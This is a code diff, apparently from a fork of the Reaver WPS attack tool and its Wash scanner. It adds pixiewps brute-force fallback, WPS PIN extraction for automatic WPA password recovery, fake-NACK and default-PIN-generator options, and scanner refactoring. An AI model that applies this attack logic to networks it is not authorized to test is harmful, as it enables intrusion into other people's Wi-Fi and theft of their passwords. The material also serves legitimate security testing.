1867 | 2000 | char pixie_pin[16]; |
1868 | 2001 | char *aux_pixie_pin; |
2002 | int i=0; | |
1869 | 2003 | |
1870 | 2004 | memset(pixie_pin, 0, sizeof(pixie_pin)); |
2005 | if ( get_debug() >= 1 ) | |
2006 | { //verbose (-vvv) | |
2007 | printf("[+] Running pixiewps with the information, wait ...\n"); | |
2008 | } | |
2009 | //printf("Cmd : %s\n",cmd_pixie); | |
1871 | 2010 | |
1872 | 2011 | while (fgets(pixie_buf_aux, 4000, fpixe) != NULL) |
1873 | 2012 | { |
1874 | ||
1875 | printf("[Pixie-Dust] %s", pixie_buf_aux); | |
2013 | if ( get_debug() >= 1 ) | |
2014 | { //verbose (-vvv) | |
2015 | printf("[Pixie-Dust] %s", pixie_buf_aux); | |
2016 | } | |
1876 | 2017 | |
1877 | 2018 | aux_pixie_pin = strstr(pixie_buf_aux,"WPS pin not found"); |
1878 | 2019 | if(aux_pixie_pin != NULL) |
1879 | 2020 | { |
1880 | 2021 | pixie_test = 0; |
1881 | //exit(0); | |
2022 | //break; | |
1882 | 2023 | } |
2024 | ||
1883 | 2025 | |
1884 | 2026 | aux_pixie_pin = strstr(pixie_buf_aux,"WPS pin:"); |
1885 | 2027 | if(aux_pixie_pin != NULL) |
1886 | 2028 | { |
1887 | 2029 | pixie_test = 1; |
1888 | //exit(0); | |
1889 | 2030 | //here will get the pin |
1890 | strncpy(pixie_pin, aux_pixie_pin + 12, 8); | |
2031 | ||
2032 | //a slightly better way to locate the pin | |
2033 | //thx offensive-security by attention | |
2034 | ||
2035 | for(i=0;i<strlen(aux_pixie_pin);i++) | |
2036 | { | |
2037 | if(isdigit(aux_pixie_pin[i])) | |
2038 | { | |
2039 | strncpy(pixie_pin, aux_pixie_pin + i, 8); | |
2040 | break; | |
2041 | } | |
2042 | } | |
2043 | ||
2044 | if ( get_debug()>=1 ) | |
2045 | { //verbose (-vvv) | |
2046 | printf("[Pixie-Dust]\n"); | |
2047 | } | |
2048 | break; | |
1891 | 2049 | } |
1892 | 2050 | |
1893 | 2051 | } |
2052 | ||
1894 | 2053 | |
1895 | 2054 | if(pclose(fpixe)) { |
1896 | 2055 | //printf("Command not found or exited with error status\n"); |
1897 | 2056 | //return -1; |
1898 | 2057 | } |
2058 | ||
2059 | ||
2060 | if(pixie_test == 0) | |
2061 | { | |
2062 | //Pin not found, trying -f (full PRNG brute force) | |
2063 | ||
2064 | strcat(cmd_pixie," -f "); | |
2065 | ||
2066 | if ( get_debug()>=1 ) | |
2067 | { //verbose (-vvv) | |
2068 | printf("[+] Pin not found, trying -f (full PRNG brute force), this may take around 30 minutes\n"); | |
2069 | } | |
2070 | //printf("Cmd : %s\n",cmd_pixie); | |
2071 | ||
2072 | if ((fpixe = popen(cmd_pixie, "r")) == NULL) { | |
2073 | if ( get_debug()>=1 ) | |
2074 | { //verbose (-vvv) | |
2075 | printf("Error opening pipe!\n"); | |
2076 | } | |
2077 | //return -1; | |
2078 | } | |
2079 | ||
2080 | while (fgets(pixie_buf_aux, 4000, fpixe) != NULL) | |
2081 | { | |
2082 | if ( get_debug()>=1 ) | |
2083 | { //verbose (-vvv) | |
2084 | printf("[Pixie-Dust] %s", pixie_buf_aux); | |
2085 | } | |
2086 | ||
2087 | aux_pixie_pin = strstr(pixie_buf_aux,"WPS pin not found"); | |
2088 | if(aux_pixie_pin != NULL) | |
2089 | { | |
2090 | pixie_test = 0; | |
2091 | break; | |
2092 | } | |
2093 | ||
2094 | aux_pixie_pin = strstr(pixie_buf_aux,"WPS pin:"); | |
2095 | if(aux_pixie_pin != NULL) | |
2096 | { | |
2097 | pixie_test = 1; | |
2098 | ||
2099 | //here will get the pin | |
2100 | ||
2101 | //a slightly better way to locate the pin | |
2102 | //thx offensive-security by attention | |
2103 | ||
2104 | for(i=0;i<strlen(aux_pixie_pin);i++) | |
2105 | { | |
2106 | if(isdigit(aux_pixie_pin[i])) | |
2107 | { | |
2108 | strncpy(pixie_pin, aux_pixie_pin + i, 8); | |
2109 | break; | |
2110 | } | |
2111 | } | |
2112 | ||
2113 | break; | |
2114 | } | |
2115 | ||
2116 | } | |
2117 | if ( get_debug()>=1 ) | |
2118 | { //verbose (-vvv) | |
2119 | printf("[Pixie-Dust]\n"); | |
2120 | } | |
2121 | ||
2122 | if(pclose(fpixe)) { | |
2123 | //printf("Command not found or exited with error status\n"); | |
2124 | //return -1; | |
2125 | } | |
2126 | ||
2127 | ||
2128 | ||
2129 | } | |
2130 | ||
1899 | 2131 | |
1900 | 2132 | if((pixie_test == 1) && (globule->op_autopass==1)) |
1901 | 2133 | { |
1902 | 2134 | //here will make the test to get pass |
1903 | 2135 | |
1904 | 2136 | FILE *fpixe_test; |
1905 | ||
1906 | //strcat(globule->cmd_reaver_test," -p "); | |
1907 | //strcat(globule->cmd_reaver_test,pixie_pin); | |
1908 | 2137 | |
1909 | 2138 | char cmd_reaver_test_aux[4000]; |
1910 | 2139 | char cmd_buf_c[5]; |
1927 | 2156 | //printf("-- %s\n",cmd_reaver_test_aux); |
1928 | 2157 | |
1929 | 2158 | if ((fpixe_test = popen(cmd_reaver_test_aux, "r")) == NULL) { |
1930 | printf("Error opening pipe!\n"); | |
2159 | if ( get_debug()==4 ) | |
2160 | { //verbose (-vvv) | |
2161 | printf("Error opening pipe!\n"); | |
2162 | } | |
1931 | 2163 | //return -1; |
1932 | 2164 | } |
1933 | 2165 | |
1934 | ||
1935 | printf("Running reaver with the correct pin, wait ...\n"); | |
1936 | printf("Cmd : %s\n\n",cmd_reaver_test_aux); | |
1937 | printf("[Reaver Test] BSSID: %s\n", mac2str(get_bssid(),':')); | |
1938 | printf("[Reaver Test] Channel: %s\n", cmd_buf_c); | |
2166 | if ( get_debug()>=3 ) | |
2167 | { //verbose (-vvv) | |
2168 | printf("[+] Running reaver with the correct pin, wait ...\n"); | |
2169 | printf("[+] Cmd : %s\n",cmd_reaver_test_aux); | |
2170 | } | |
2171 | printf("[Reaver Test] [+] BSSID: %s\n", mac2str(get_bssid(),':')); | |
2172 | printf("[Reaver Test] [+] Channel: %s\n", cmd_buf_c); | |
2173 | ||
1939 | 2174 | //printf("Command : \n", globule->cmd_reaver_test); |
1940 | 2175 | while (fgets(pixie_buf_aux2, 4000, fpixe_test) != NULL) |
1941 | 2176 | { |
1968 | 2203 | } |
1969 | 2204 | |
1970 | 2205 | } |
1971 | ||
1972 | //printf(" %s ",cmd_pixie); | |
1973 | ||
1974 | ||
2206 | ||
1975 | 2207 | return 0; |
1976 | 2208 | } |
1977 | 2209 | |
2103 | 2335 | wps->dh_pubkey_e = wpabuf_alloc_copy(pk, pk_len); |
2104 | 2336 | if (wps->dh_pubkey_e == NULL) |
2105 | 2337 | return -1; |
2338 | ||
2339 | ||
2106 | 2340 | |
2107 | 2341 | /****** ADD THIS PART ******/ |
2108 | // memset (cmd_pixie,0,sizeof(cmd_pixie)); | |
2109 | strcat(cmd_pixie," -e "); | |
2110 | //sprintf( cmd_pixie, "", cmd_pixie, str2); | |
2111 | ||
2112 | printf("[P] PKE: "); | |
2342 | ||
2343 | memset(pixie_pke,0,sizeof(pixie_pke)); | |
2344 | if ( get_debug()==4 ) | |
2345 | { //verbose (-vvv) | |
2346 | printf("[P] PKE: "); | |
2347 | } | |
2113 | 2348 | int pixiecnt = 0; |
2114 | 2349 | for (; pixiecnt < 192; pixiecnt++) { |
2115 | printf("%02x", pk[pixiecnt]); | |
2350 | if ( get_debug()==4 ) | |
2351 | { //verbose (-vvv) | |
2352 | printf("%02x", pk[pixiecnt]); | |
2353 | } | |
2116 | 2354 | sprintf(cmd_pixie_aux, "%02x", pk[pixiecnt]); |
2117 | strcat(cmd_pixie,cmd_pixie_aux); | |
2355 | strcat(pixie_pke, cmd_pixie_aux); | |
2118 | 2356 | if (pixiecnt != 191) { |
2119 | printf(":"); | |
2120 | strcat(cmd_pixie,":"); | |
2121 | } | |
2122 | } | |
2123 | printf("\n"); | |
2357 | if ( get_debug()==4 ) | |
2358 | { //verbose (-vvv) | |
2359 | printf(":"); | |
2360 | } | |
2361 | strcat(pixie_pke,":"); | |
2362 | } | |
2363 | } | |
2364 | if ( get_debug()==4 ) | |
2365 | { //verbose (-vvv) | |
2366 | printf("\n"); | |
2367 | } | |
2124 | 2368 | /******/ |
2369 | ||
2370 | ||
2125 | 2371 | |
2126 | 2372 | return 0; |
2127 | 2373 | } |
0 | 0 | /* |
1 | 1 | * Reaver - Main and usage functions |
2 | 2 | * Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <[email protected]> |
3 | * Copyright (c) 2016, Koko Software, Adrian Warecki <[email protected]> | |
3 | 4 | * |
4 | 5 | * This program is free software; you can redistribute it and/or modify |
5 | 6 | * it under the terms of the GNU General Public License as published by |
36 | 37 | |
37 | 38 | int main(int argc, char **argv) |
38 | 39 | { |
39 | int ret_val = EXIT_FAILURE, r = 0; | |
40 | int ret_val = EXIT_FAILURE; | |
40 | 41 | time_t start_time = 0, end_time = 0; |
41 | 42 | struct wps_data *wps = NULL; |
42 | 43 | |
43 | 44 | |
44 | 45 | globule_init(); |
45 | sql_init(); | |
46 | 46 | init_default_settings(); |
47 | 47 | |
48 | 48 | int cont_arg_rev; |
55 | 55 | |
56 | 56 | printf("\nReaver v%s WiFi Protected Setup Attack Tool\n", PACKAGE_VERSION); |
57 | 57 | printf("Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <[email protected]>\n"); |
58 | printf("mod by t6_x <[email protected]> & DataHead & Soxrok2212\n\n"); | |
58 | printf("mod by t6_x <[email protected]> & DataHead & Soxrok2212 & Wiire & AAnarchYY & KokoSoft\n\n"); | |
59 | 59 | |
60 | 60 | if(argc < 2) |
61 | 61 | { |
87 | 87 | } |
88 | 88 | } |
89 | 89 | |
90 | /* Sanity checking on the message timeout value */ | |
91 | if(get_m57_timeout() > M57_MAX_TIMEOUT) | |
90 | /* Sanity checking on the message timeout value */ | |
91 | if(get_m57_timeout() > M57_MAX_TIMEOUT) | |
92 | 92 | { |
93 | 93 | set_m57_timeout(M57_MAX_TIMEOUT); |
94 | 94 | } |
129 | 129 | /* Run user-supplied command */ |
130 | 130 | if(get_exec_string()) |
131 | 131 | { |
132 | r = system(get_exec_string()); | |
132 | system(get_exec_string()); | |
133 | 133 | } |
134 | 134 | |
135 | 135 | ret_val = EXIT_SUCCESS; |
136 | 136 | } |
137 | else | |
137 | else | |
138 | 138 | { |
139 | 139 | cprintf(CRITICAL, "[-] Failed to recover WPA key\n"); |
140 | 140 | } |
164 | 164 | fprintf(stderr, "\t-s, --session=<file> Restore a previous session file\n"); |
165 | 165 | fprintf(stderr, "\t-C, --exec=<command> Execute the supplied command upon successful pin recovery\n"); |
166 | 166 | fprintf(stderr, "\t-D, --daemonize Daemonize reaver\n"); |
167 | fprintf(stderr, "\t-a, --auto Auto detect the best advanced options for the target AP\n"); | |
168 | 167 | fprintf(stderr, "\t-f, --fixed Disable channel hopping\n"); |
169 | 168 | fprintf(stderr, "\t-5, --5ghz Use 5GHz 802.11 channels\n"); |
170 | 169 | fprintf(stderr, "\t-v, --verbose Display non-critical warnings (-vv for more)\n"); |
171 | 170 | fprintf(stderr, "\t-q, --quiet Only display critical messages\n"); |
172 | 171 | //fprintf(stderr, "\t-K, --pixie-dust Test Pixie Dust [1] Basic(-S) [2] With E-Once(-S) [3] With PKR \n"); |
173 | fprintf(stderr, "\t-K --pixie-dust=<number> [1] Run pixiewps with PKE, PKR, E-Hash1, E-Hash2 and E-Nonce (Ralink, Broadcom, Realtek)\n"); | |
172 | fprintf(stderr, "\t-K --pixie-dust=<number> [1] Run pixiewps with PKE, PKR, E-Hash1, E-Hash2 and E-Nonce (Ralink, Broadcom & Realtek)\n"); | |
174 | 173 | fprintf(stderr, "\t-Z, --no-auto-pass Do NOT run reaver to auto retrieve WPA password if Pixiewps attack is successful\n"); |
175 | 174 | fprintf(stderr, "\t-h, --help Show help\n"); |
176 | 175 | |
178 | 177 | fprintf(stderr, "\t-p, --pin=<wps pin> Use the specified 4 or 8 digit WPS pin\n"); |
179 | 178 | fprintf(stderr, "\t-d, --delay=<seconds> Set the delay between pin attempts [%d]\n", DEFAULT_DELAY); |
180 | 179 | fprintf(stderr, "\t-l, --lock-delay=<seconds> Set the time to wait if the AP locks WPS pin attempts [%d]\n", DEFAULT_LOCK_DELAY); |
180 | fprintf(stderr, "\t-F, --fake-delay=<seconds> Set the time to sleep after received fake NACK [%d]\n",DEFAULT_FK_NACK_DELAY); | |
181 | fprintf(stderr, "\t-R, --fake-reason=<nack reason> Specifies the reason code for NACK used in the FAKE NACK\n"); | |
182 | fprintf(stderr, "\t-I, --ignore-reason Ignore change of reason code for NACK\n"); | |
181 | 183 | fprintf(stderr, "\t-g, --max-attempts=<num> Quit after num pin attempts\n"); |
182 | 184 | fprintf(stderr, "\t-x, --fail-wait=<seconds> Set the time to sleep after %d unexpected failures [0]\n", WARN_FAILURE_COUNT); |
183 | 185 | fprintf(stderr, "\t-r, --recurring-delay=<x:y> Sleep for y seconds every x pin attempts\n"); |
194 | 196 | fprintf(stderr, "\t-1, --p1-index Set initial array index for the first half of the pin [False]\n"); |
195 | 197 | fprintf(stderr, "\t-2, --p2-index Set initial array index for the second half of the pin [False]\n"); |
196 | 198 | fprintf(stderr, "\t-P, --pixiedust-loop Set into PixieLoop mode (doesn't send M4, and loops through to M3) [False]\n"); |
197 | fprintf(stderr, "\t-W, --generate-pin Default Pin Generator by devttys0 team [1] Belkin [2] D-Link\n"); | |
198 | ||
199 | ||
200 | fprintf(stderr, "\nExample:\n\t%s -i mon0 -b 00:90:4C:C1:AC:21 -vv -K 1\n\n", prog_name); | |
199 | fprintf(stderr, "\t-W, --generate-pin Default Pin Generator [1] Belkin [2] D-Link [3] Zyxel\n"); | |
200 | fprintf(stderr, "\t-H, --pixiedust-log Enables logging of sequence completed PixieHashes\n"); | |
201 | ||
202 | ||
203 | fprintf(stderr, "\nExample:\n\t%s -i wlan0mon -b 00:90:4C:C1:AC:21 -vvv -K 1\n\n", prog_name); | |
201 | 204 | |
202 | 205 | return EXIT_FAILURE; |
203 | 206 | } |
35 | 35 | int o_file_p = 0; |
36 | 36 | int get_chipset_output = 0; |
37 | 37 | int c_fix = 0; |
38 | int show_all_aps = 0; | |
39 | ||
40 | static struct mac { | |
41 | unsigned char mac[6]; | |
42 | unsigned char probes; | |
43 | unsigned char flags; | |
44 | } seen_list[256]; | |
45 | enum seen_flags { | |
46 | SEEN_FLAG_PRINTED = 1, | |
47 | SEEN_FLAG_COMPLETE = 2, | |
48 | }; | |
49 | static unsigned seen_count; | |
50 | static int list_insert(char *bssid) { | |
51 | unsigned i; | |
52 | unsigned char mac[6]; | |
53 | str2mac(bssid, mac); | |
54 | if(seen_count >= 256) return -1; | |
55 | for(i=0; i<seen_count; i++) | |
56 | if(!memcmp(seen_list[i].mac, mac, 6)) return i; | |
57 | memcpy(seen_list[seen_count].mac, mac, 6); | |
58 | return seen_count++; | |
59 | } | |
60 | static int was_printed(char* bssid) { | |
61 | int x = list_insert(bssid); | |
62 | if(x >= 0 && x < 256) { | |
63 | unsigned f = seen_list[x].flags; | |
64 | seen_list[x].flags |= SEEN_FLAG_PRINTED; | |
65 | return f & SEEN_FLAG_PRINTED; | |
66 | } | |
67 | return 1; | |
68 | } | |
69 | static void mark_ap_complete(char *bssid) { | |
70 | int x = list_insert(bssid); | |
71 | if(x >= 0 && x < 256) seen_list[x].flags |= SEEN_FLAG_COMPLETE; | |
72 | } | |
73 | static int is_done(char *bssid) { | |
74 | int x = list_insert(bssid); | |
75 | if(x >= 0 && x < 256) return seen_list[x].flags & SEEN_FLAG_COMPLETE; | |
76 | return 1; | |
77 | } | |
78 | static int should_probe(char *bssid) { | |
79 | int x = list_insert(bssid); | |
80 | if(x >= 0 && x < 256) return seen_list[x].probes < get_max_num_probes(); | |
81 | return 0; | |
82 | } | |
83 | static void update_probe_count(char *bssid) { | |
84 | int x = list_insert(bssid); | |
85 | if(x >= 0 && x < 256) seen_list[x].probes++; | |
86 | } | |
38 | 87 | |
39 | 88 | int main(int argc, char *argv[]) |
40 | 89 | { |
44 | 93 | int source = INTERFACE, ret_val = EXIT_FAILURE; |
45 | 94 | struct bpf_program bpf = { 0 }; |
46 | 95 | char *out_file = NULL, *last_optarg = NULL, *target = NULL, *bssid = NULL; |
47 | char *short_options = "i:c:n:o:b:5sfuCDhPg"; | |
96 | char *short_options = "i:c:n:o:b:5sfuDhPga"; | |
48 | 97 | struct option long_options[] = { |
49 | 98 | { "get-chipset", no_argument, NULL, 'g' }, |
50 | 99 | { "output-piped", no_argument, NULL, 'P' }, |
55 | 104 | { "probes", required_argument, NULL, 'n' }, |
56 | 105 | { "daemonize", no_argument, NULL, 'D' }, |
57 | 106 | { "file", no_argument, NULL, 'f' }, |
58 | { "ignore-fcs", no_argument, NULL, 'C' }, | |
59 | 107 | { "5ghz", no_argument, NULL, '5' }, |
60 | 108 | { "scan", no_argument, NULL, 's' }, |
61 | 109 | { "survey", no_argument, NULL, 'u' }, |
110 | { "all", no_argument, NULL, 'a' }, | |
62 | 111 | { "help", no_argument, NULL, 'h' }, |
63 | 112 | { 0, 0, 0, 0 } |
64 | 113 | }; |
65 | ||
114 | ||
66 | 115 | |
67 | 116 | globule_init(); |
68 | sql_init(); | |
69 | create_ap_table(); | |
70 | 117 | set_auto_channel_select(0); |
71 | 118 | set_wifi_band(BG_BAND); |
72 | 119 | set_debug(INFO); |
73 | set_validate_fcs(1); | |
120 | set_validate_fcs(0); | |
74 | 121 | set_log_file(stdout); |
75 | 122 | set_max_num_probes(DEFAULT_MAX_NUM_PROBES); |
76 | 123 | |
114 | 161 | case 'u': |
115 | 162 | mode = SURVEY; |
116 | 163 | break; |
117 | case 'C': | |
118 | set_validate_fcs(0); | |
119 | break; | |
120 | 164 | case 'D': |
121 | 165 | daemonize(); |
166 | break; | |
167 | case 'a': | |
168 | show_all_aps = 1; | |
122 | 169 | break; |
123 | 170 | default: |
124 | 171 | usage(argv[0]); |
136 | 183 | last_optarg = strdup(optarg); |
137 | 184 | } |
138 | 185 | } |
139 | ||
186 | ||
140 | 187 | if (o_file_p == 0) |
141 | 188 | { |
142 | 189 | printf("\nWash v%s WiFi Protected Setup Scan Tool\n", PACKAGE_VERSION); |
143 | printf("Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <[email protected]>\n"); | |
144 | printf("mod by t6_x <[email protected]> & DataHead & Soxrok2212\n\n"); | |
145 | } | |
190 | printf("Copyright (c) 2011, Tactical Network Solutions, Craig Heffner\n"); | |
191 | printf("mod by t6_x<[email protected]>, DataHead, Soxrok2212, Wiire, AAnarchYY & rofl0r\n\n"); | |
192 | } | |
146 | 193 | |
147 | 194 | /* The interface value won't be set if capture files were specified; else, there should have been an interface specified */ |
148 | 195 | if(!get_iface() && source != PCAP_FILE) |
172 | 219 | /* Open the output file, if any. If none, write to stdout. */ |
173 | 220 | if(out_file) |
174 | 221 | { |
175 | ||
222 | ||
176 | 223 | fp = fopen(out_file, "wb"); |
177 | 224 | if(!fp) |
178 | 225 | { |
179 | 226 | cprintf(CRITICAL, "[X] ERROR: Failed to open '%s' for writing\n", out_file); |
180 | 227 | goto end; |
181 | 228 | } |
182 | ||
229 | ||
183 | 230 | |
184 | 231 | set_log_file(fp); |
185 | 232 | } |
186 | 233 | |
187 | /* | |
234 | /* | |
188 | 235 | * Loop through all of the specified capture sources. If an interface was specified, this will only loop once and the |
189 | 236 | * call to monitor() will block indefinitely. If capture files were specified, this will loop through each file specified |
190 | 237 | * on the command line and monitor() will return after each file has been processed. |
240 | 287 | |
241 | 288 | end: |
242 | 289 | globule_deinit(); |
243 | sql_cleanup(); | |
244 | 290 | if(bssid) free(bssid); |
245 | 291 | if(out_file) free(out_file); |
246 | 292 | if(wpsmon.fp) fclose(wpsmon.fp); |
262 | 308 | /* If we aren't reading from a pcap file, set the interface channel */ |
263 | 309 | if(source == INTERFACE) |
264 | 310 | { |
265 | /* | |
266 | * If a channel has been specified, set the interface to that channel. | |
267 | * Else, set a recurring 1 second timer that will call sigalrm() and switch to | |
311 | /* | |
312 | * If a channel has been specified, set the interface to that channel. | |
313 | * Else, set a recurring 1 second timer that will call sigalrm() and switch to | |
268 | 314 | * a new channel. |
269 | 315 | */ |
270 | 316 | if(channel > 0) |
284 | 330 | { |
285 | 331 | if (o_file_p == 0) |
286 | 332 | { |
287 | cprintf(INFO, "BSSID Channel RSSI WPS Version WPS Locked ESSID\n"); | |
288 | cprintf(INFO, "---------------------------------------------------------------------------------------------------------------\n"); | |
333 | cprintf (INFO, "BSSID Ch dBm WPS Lck ESSID\n"); | |
334 | //cprintf(INFO, "00:11:22:33:44:55 12 -77 1.0 Yes 0123456789abcdef0123456789abcdef\n"); | |
335 | cprintf (INFO, "--------------------------------------------------------------------------------\n"); | |
289 | 336 | header_printed = 1; |
290 | 337 | } |
291 | ||
338 | ||
292 | 339 | } |
293 | 340 | |
294 | 341 | while((packet = next_packet(&header))) |
295 | 342 | { |
296 | 343 | parse_wps_settings(packet, &header, bssid, passive, mode, source); |
344 | #ifndef __APPLE__ | |
297 | 345 | memset((void *) packet, 0, header.len); |
346 | #endif | |
298 | 347 | } |
299 | 348 | |
300 | 349 | return; |
309 | 358 | char *bssid = NULL, *ssid = NULL, *lock_display = NULL; |
310 | 359 | int wps_parsed = 0, probe_sent = 0, channel = 0, rssi = 0; |
311 | 360 | static int channel_changed = 0; |
312 | ||
361 | ||
313 | 362 | char info_manufac[500]; |
314 | 363 | char info_modelnum[500]; |
315 | 364 | char info_modelserial[500]; |
323 | 372 | } |
324 | 373 | |
325 | 374 | rt_header = (struct radio_tap_header *) radio_header(packet, header->len); |
375 | ||
326 | 376 | frame_header = (struct dot11_frame_header *) (packet + rt_header->len); |
327 | 377 | |
328 | 378 | /* If a specific BSSID was specified, only parse packets from that BSSID */ |
351 | 401 | channel_changed = 1; |
352 | 402 | } |
353 | 403 | |
404 | ||
405 | ||
406 | ||
407 | ||
354 | 408 | if(frame_header->fc.sub_type == PROBE_RESPONSE || |
355 | 409 | frame_header->fc.sub_type == SUBTYPE_BEACON) |
356 | 410 | { |
359 | 413 | |
360 | 414 | if(!is_done(bssid) && (get_channel() == channel || source == PCAP_FILE)) |
361 | 415 | { |
362 | if(frame_header->fc.sub_type == SUBTYPE_BEACON && | |
363 | mode == SCAN && | |
364 | !passive && | |
365 | should_probe(bssid)) | |
416 | if(frame_header->fc.sub_type == SUBTYPE_BEACON && | |
417 | mode == SCAN && | |
418 | !passive && | |
419 | // should_probe(bssid)) | |
420 | should_probe(bssid) | |
421 | #ifdef __APPLE__ | |
422 | && 0 | |
423 | #endif | |
424 | ) | |
366 | 425 | { |
367 | 426 | send_probe_request(get_bssid(), get_ssid()); |
368 | 427 | probe_sent = 1; |
369 | 428 | } |
370 | ||
371 | if(!insert(bssid, ssid, wps, encryption, rssi)) | |
429 | if(!was_printed(bssid) && (wps->version > 0 || show_all_aps == 1)) | |
372 | 430 | { |
373 | update(bssid, ssid, wps, encryption); | |
374 | } | |
375 | else if(wps->version > 0) | |
376 | { | |
377 | switch(wps->locked) | |
431 | if(wps->version > 0) switch(wps->locked) | |
378 | 432 | { |
379 | 433 | case WPSLOCKED: |
380 | 434 | lock_display = YES; |
383 | 437 | case UNSPECIFIED: |
384 | 438 | lock_display = NO; |
385 | 439 | break; |
386 | } | |
387 | ||
440 | } else lock_display = NO; | |
441 | ||
388 | 442 | //ideas made by kcdtv |
389 | ||
443 | ||
390 | 444 | if(get_chipset_output == 1) |
391 | 445 | //if(1) |
392 | 446 | { |
396 | 450 | cprintf(INFO,"Option (-g) REQUIRES a channel to be set with (-c)\n"); |
397 | 451 | exit(0); |
398 | 452 | } |
399 | ||
453 | ||
400 | 454 | FILE *fgchipset=NULL; |
401 | 455 | char cmd_chipset[4000]; |
402 | 456 | char cmd_chipset_buf[4000]; |
403 | 457 | char buffint[5]; |
404 | ||
458 | ||
405 | 459 | char *aux_cmd_chipset=NULL; |
406 | ||
407 | ||
408 | ||
460 | ||
461 | ||
462 | ||
409 | 463 | memset(cmd_chipset, 0, sizeof(cmd_chipset)); |
410 | 464 | memset(cmd_chipset_buf, 0, sizeof(cmd_chipset_buf)); |
411 | 465 | memset(info_manufac, 0, sizeof(info_manufac)); |
412 | 466 | memset(info_modelnum, 0, sizeof(info_modelnum)); |
413 | 467 | memset(info_modelserial, 0, sizeof(info_modelserial)); |
414 | ||
415 | ||
416 | ||
468 | ||
469 | ||
470 | ||
417 | 471 | strcat(cmd_chipset,"reaver -0 -s y -vv -i "); //need option to stop reaver in m1 stage |
418 | 472 | strcat(cmd_chipset,get_iface()); |
419 | ||
473 | ||
420 | 474 | strcat(cmd_chipset, " -b "); |
421 | 475 | strcat(cmd_chipset, mac2str(get_bssid(),':')); |
422 | ||
476 | ||
423 | 477 | strcat(cmd_chipset," -c "); |
424 | 478 | snprintf(buffint, sizeof(buffint), "%d",channel); |
425 | 479 | strcat(cmd_chipset, buffint); |
426 | ||
480 | ||
427 | 481 | //cprintf(INFO,"\n%s\n",cmd_chipset); |
428 | 482 | |
429 | 483 | if ((fgchipset = popen(cmd_chipset, "r")) == NULL) { |
430 | 484 | printf("Error opening pipe!\n"); |
431 | 485 | //return -1; |
432 | 486 | } |
433 | ||
434 | ||
435 | ||
436 | while (fgets(cmd_chipset_buf, 4000, fgchipset) != NULL) | |
487 | ||
488 | ||
489 | ||
490 | while (fgets(cmd_chipset_buf, 4000, fgchipset) != NULL) | |
437 | 491 | { |
438 | 492 | //[P] WPS Manufacturer: xxx |
439 | 493 | //[P] WPS Model Number: yyy |
443 | 497 | aux_cmd_chipset = strstr(cmd_chipset_buf,"[P] WPS Manufacturer:"); |
444 | 498 | if(aux_cmd_chipset != NULL) |
445 | 499 | { |
446 | //md_chipset_buf | |
447 | strncpy(info_manufac, aux_cmd_chipset+21, sizeof(cmd_chipset_buf)); | |
448 | //cprintf(INFO,"%s\n",info_manufac); | |
449 | ||
500 | //bug fix by alxchk | |
501 | strncpy(info_manufac, aux_cmd_chipset+21, sizeof(info_manufac)); | |
450 | 502 | } |
451 | 503 | |
452 | 504 | aux_cmd_chipset = strstr(cmd_chipset_buf,"[P] WPS Model Number:"); |
453 | 505 | if(aux_cmd_chipset != NULL) |
454 | 506 | { |
455 | strncpy(info_modelnum, aux_cmd_chipset+21, sizeof(cmd_chipset_buf)); | |
456 | ||
507 | //bug fix by alxchk | |
508 | strncpy(info_modelnum, aux_cmd_chipset+21, sizeof(info_modelnum)); | |
509 | ||
457 | 510 | } |
458 | 511 | |
459 | 512 | aux_cmd_chipset = strstr(cmd_chipset_buf,"[P] WPS Model Serial Number:"); |
460 | 513 | if(aux_cmd_chipset != NULL) |
461 | 514 | { |
462 | strncpy(info_modelserial, aux_cmd_chipset+28, sizeof(cmd_chipset_buf)); | |
463 | ||
515 | //bug fix by alxchk | |
516 | strncpy(info_modelserial, aux_cmd_chipset+28, sizeof(info_modelserial)); | |
517 | ||
464 | 518 | } |
465 | 519 | |
466 | 520 | } |
467 | ||
521 | ||
468 | 522 | //cprintf(INFO,"\n%s\n",info_manufac); |
469 | 523 | info_manufac[strcspn ( info_manufac, "\n" )] = '\0'; |
470 | 524 | info_modelnum[strcspn ( info_modelnum, "\n" )] = '\0'; |
471 | 525 | info_modelserial[strcspn ( info_modelserial, "\n" )] = '\0'; |
472 | ||
526 | ||
473 | 527 | |
474 | 528 | |
475 | 529 | if(pclose(fgchipset)) { |
477 | 531 | //return -1; |
478 | 532 | } |
479 | 533 | |
480 | ||
534 | ||
481 | 535 | |
482 | 536 | } |
483 | ||
484 | ||
537 | ||
538 | ||
485 | 539 | if (o_file_p == 0) |
486 | 540 | { |
487 | cprintf(INFO, "%17s %2d %.2d %d.%d %s %s\n", bssid, channel, rssi, (wps->version >> 4), (wps->version & 0x0F), lock_display, ssid); | |
541 | if(wps->version > 0) | |
542 | cprintf(INFO, "%17s %2d %.2d %d.%d %3s %s\n", bssid, channel, rssi, (wps->version >> 4), (wps->version & 0x0F), lock_display, ssid); | |
543 | else | |
544 | cprintf(INFO, "%17s %2d %.2d %s\n", bssid, channel, rssi, ssid); | |
488 | 545 | } |
489 | 546 | else |
490 | 547 | { |
491 | 548 | if(get_chipset_output == 1) |
492 | 549 | { |
493 | 550 | cprintf(INFO, "%17s|%2d|%.2d|%d.%d|%s|%s|%s|%s|%s\n", bssid, channel, rssi, (wps->version >> 4), (wps->version & 0x0F), lock_display, ssid, info_manufac, info_modelnum, info_modelserial); |
494 | ||
551 | ||
495 | 552 | }else |
496 | 553 | { |
497 | 554 | cprintf(INFO, "%17s|%2d|%.2d|%d.%d|%s|%s\n", bssid, channel, rssi, (wps->version >> 4), (wps->version & 0x0F), lock_display, ssid); |
498 | ||
555 | ||
499 | 556 | } |
500 | ||
557 | ||
501 | 558 | } |
502 | 559 | } |
503 | 560 | |
506 | 563 | update_probe_count(bssid); |
507 | 564 | } |
508 | 565 | |
509 | /* | |
566 | /* | |
510 | 567 | * If there was no WPS information, then the AP does not support WPS and we should ignore it from here on. |
511 | 568 | * If this was a probe response, then we've gotten all WPS info we can get from this AP and should ignore it from here on. |
512 | 569 | */ |
518 | 575 | } |
519 | 576 | } |
520 | 577 | |
521 | /* Only update received signal strength if we are on the same channel as the AP, otherwise power measurements are screwy */ | |
522 | if(channel == get_channel()) | |
523 | { | |
524 | update_ap_power(bssid, rssi); | |
525 | } | |
526 | ||
527 | 578 | free(bssid); |
528 | 579 | bssid = NULL; |
529 | 580 | } |
568 | 619 | fprintf(stderr, "\t-o, --out-file=<file> Write data to file\n"); |
